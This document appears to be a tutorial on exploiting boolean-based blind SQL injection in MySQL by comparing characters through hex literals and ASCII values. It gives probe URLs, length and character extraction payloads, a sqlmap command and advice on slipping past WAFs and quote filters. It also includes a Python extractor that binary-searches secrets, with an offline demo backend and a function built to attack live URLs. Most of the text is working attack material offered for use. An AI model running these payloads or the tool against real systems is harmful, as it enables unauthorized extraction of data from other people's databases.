TL;DR
This guide shows how to exploit a boolean-based blind SQL injection where the injected value can contain hex literals (for example 0x61 for 'a'), which lets you compare characters without ever sending a quote character. We'll use this to extract data one character at a time, even when you see no error messages and no direct query results.
Understanding the Problem
Blind SQL injection means the web application doesn't show you the results of your injected query. Instead, you infer information from the application's response, usually whether the page renders differently for a true condition than for a false one. In this case the injection point also accepts hex literals, so string comparisons can be written without quotes, which matters when quotes are filtered or escaped.
Solution
- Identify the Injection Point: First, find a URL parameter or form field where you suspect an injection vulnerability. Add a single quote (') and see whether it causes an error (if visible) or changes the application's behaviour:
http://example.com/page?id=1'
- Confirm Blind Injection: If you don't get a direct error, test for blind injection with boolean-based conditions. For example:
http://example.com/page?id=1 AND 1=1 (should behave normally)
http://example.com/page?id=1 AND 1=2 (should behave differently: page not found, different content, etc.)
If both responses are identical, the parameter may not be injectable, or the condition may need a different context (for a quoted parameter, try id=1' AND '1'='1).
- Determine the Hex Injection Method: How you use hex depends on how the application and the database handle it. Two common cases:
- HEX() function: MySQL and some other databases have a built-in HEX() function that converts a string to its hexadecimal representation, so you can compare HEX(value) against a hex string.
- Direct hex literals: MySQL interprets an unquoted 0x... literal as a string in a string comparison, so SUBSTRING(x,1,1)=0x61 compares the first character with 'a' without any quotes.
- Extracting Data Character by Character (Using SUBSTRING()/ASCII()): This is the standard technique. Extract the length of the target string first, then each character. On MySQL the current database name is returned by DATABASE(), so that is the expression to probe (a user variable such as @db_name would only hold a value if the query itself set it).
- Find Database Length: Test candidate lengths until the response changes:
http://example.com/page?id=1 AND LENGTH(DATABASE())=1
Increment the number (1, 2, 3...) until the true-branch response appears. A comparison such as LENGTH(DATABASE())>8 lets you binary-search instead of counting up.
- Extract Each Character: Once you know the length, test each position with SUBSTRING(). For example, to get the first character:
http://example.com/page?id=1 AND SUBSTRING(DATABASE(),1,1)='a'
(Replace 'a' with different characters until you find a match.) If quotes are filtered, compare with the hex literal instead: SUBSTRING(DATABASE(),1,1)=0x61.
- Compare ASCII Values: Alternatively, compare the character's ASCII code. This also avoids quotes and allows > and < comparisons, so each character can be found with a binary search rather than a linear scan:
http://example.com/page?id=1 AND ASCII(SUBSTRING(DATABASE(),1,1))=97
(97 is the ASCII code for 'a'.)
- Extracting Data Character by Character (Direct Hex Input): If the database accepts hex literals directly (MySQL does):
- Convert Characters to Hex: Convert each candidate character into its hexadecimal representation. For example, 'a' is 0x61; a whole string can be encoded the same way, so 'admin' is 0x61646d696e.
- Inject Hex String: Compare the target against the hex literal. The exact syntax depends on the database system. For MySQL:
http://example.com/page?id=1 AND SUBSTRING(DATABASE(),1,1)=0x61
(Replace 0x61 with the hex representation of each candidate character, and advance the position argument of SUBSTRING() for each character.) Comparing the whole value at once, e.g. DATABASE()=0x61646d696e, only works when you already have a guess for the full name.
- Automate the Process: Manually testing each character is slow. Use a tool like Burp Suite or sqlmap to automate it.
- Burp Suite Intruder: Configure Intruder with the character position and the ASCII value (or hex byte) as payload positions, then sort the results by response length or by a grep match on the true-branch content.
- sqlmap: sqlmap detects and exploits boolean-based blind injection automatically, and its --hex option makes it retrieve data through hex conversion, which sidesteps quote and charset problems in the same way as the manual hex payloads above:
sqlmap -u "http://example.com/page?id=1" --technique=B --dbs --hex
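The steps above, as an added example that is not code from the original page: a small extractor that recovers a string one character at a time with a binary search on its ASCII value, using only quote-free comparisons. The MySQL payload templates are the forms discussed above (ORD/SUBSTRING comparisons, a 0x.. hex literal for the final equality check); the sqlite backend is a constructed stand-in for the vulnerable application so the script runs offline, and the target URL, parameter name and "true" marker text in the HTTP oracle are assumptions. It also handles the case the text does not mention: a character outside the printable range searched is reported as "?" instead of being silently wrong.

```python
"""Boolean-based blind SQL injection, character by character.

Added example, not code from the original page. MySQL templates are the
quote-free payloads described in the text; the sqlite backend is a
constructed stand-in for the vulnerable app; the HTTP oracle's URL,
parameter name and marker text are assumptions.
"""
import sqlite3
import urllib.parse
import urllib.request
from typing import Callable

# An oracle takes one SQL condition and returns True when the application
# responded with its "condition true" page.
Oracle = Callable[[str], bool]

DIALECTS = {
    # MySQL: what you would send as http://example.com/page?id=1 AND <cond>.
    "mysql": {
        "target": "DATABASE()",
        "len_gt": "LENGTH({t})>{n}",
        "ord_gt": "ORD(SUBSTRING({t},{pos},1))>{n}",
        "char_is": "SUBSTRING({t},{pos},1)=0x{hex}",
    },
    # SQLite equivalents, used only by the offline demo backend below
    # (SQLite has no 0x string literal, so the check compares code points).
    "sqlite": {
        "target": "secret",
        "len_gt": "length({t})>{n}",
        "ord_gt": "unicode(substr({t},{pos},1))>{n}",
        "char_is": "unicode(substr({t},{pos},1))={ord}",
    },
}


def build(dialect: str, key: str, **kw) -> str:
    """Render one payload template; keywords a template does not use are ignored."""
    d = DIALECTS[dialect]
    return d[key].format(t=d["target"], **kw)


def find_length(oracle: Oracle, dialect: str, max_len: int = 64) -> int:
    """Binary-search the string length with LENGTH(x)>n probes."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(build(dialect, "len_gt", n=mid)):
            lo = mid + 1        # length > mid
        else:
            hi = mid            # length <= mid
    return lo


def find_char(oracle: Oracle, dialect: str, pos: int) -> str:
    """Binary-search one character over printable ASCII (32..126)."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(build(dialect, "ord_gt", pos=pos, n=mid)):
            lo = mid + 1
        else:
            hi = mid
    # Confirm with an equality probe (the hex-literal form on MySQL). It fails
    # only when the real character lies outside the range we searched.
    ok = oracle(build(dialect, "char_is", pos=pos, hex=format(lo, "02x"), ord=lo))
    return chr(lo) if ok else "?"


def extract(oracle: Oracle, dialect: str = "mysql") -> str:
    """Recover the whole target string: length first, then every position."""
    n = find_length(oracle, dialect)
    return "".join(find_char(oracle, dialect, pos) for pos in range(1, n + 1))


class DemoOracle:
    """Constructed vulnerable app: the condition is spliced straight into SQL."""

    def __init__(self, secret: str):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE pages (id INTEGER, secret TEXT)")
        self.db.execute("INSERT INTO pages VALUES (1, ?)", (secret,))
        self.requests = 0

    def __call__(self, cond: str) -> bool:
        self.requests += 1
        rows = self.db.execute(f"SELECT id FROM pages WHERE id=1 AND {cond}").fetchall()
        return bool(rows)   # a row back == the "true" page rendered


def http_oracle(url: str, param: str, marker: str) -> Oracle:
    """Oracle for a live target (assumed shape): GET url?param=1 AND <cond>
    and treat the presence of `marker` in the body as the "true" response."""
    def probe(cond: str) -> bool:
        qs = urllib.parse.urlencode({param: f"1 AND {cond}"})
        body = urllib.request.urlopen(f"{url}?{qs}", timeout=10).read()
        return marker in body.decode("utf-8", errors="replace")
    return probe


if __name__ == "__main__":
    demo = DemoOracle("app_db")            # constructed secret
    print(extract(demo, "sqlite"), "recovered in", demo.requests, "requests")
    # Against a live target you would use something like:
    # extract(http_oracle("http://example.com/page", "id", "Welcome"), "mysql")
```

The binary search needs about seven requests per character instead of up to 95 for a linear scan, which is what makes a manual-style extraction tolerable under rate limiting; the equality probe at the end of each position is the only place the hex literal is actually needed, and on a real MySQL target it is the quote-free check the page describes.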
Important Considerations
- Database System: The specific SQL syntax (e.g., HEX(), SUBSTRING(), ASCII()) varies between database systems. MySQL exposes the current database as DATABASE(), MSSQL as DB_NAME() and PostgreSQL as current_database(); the 0x... string literal is MySQL-specific, so on other engines build characters with CHAR(97) (MSSQL) or CHR(97) (PostgreSQL, Oracle) or compare ASCII codes instead.
- Error Handling: Pay attention to how the application handles errors or unexpected input. This can provide clues about the database in use and about where your input lands in the query.
- Rate Limiting and WAFs: Be aware of rate limiting and web application firewalls (WAFs) that might block your requests. Slow down your requests and try different encodings; the quote-free hex and ASCII comparisons above are themselves a common way past filters that key on quote characters.

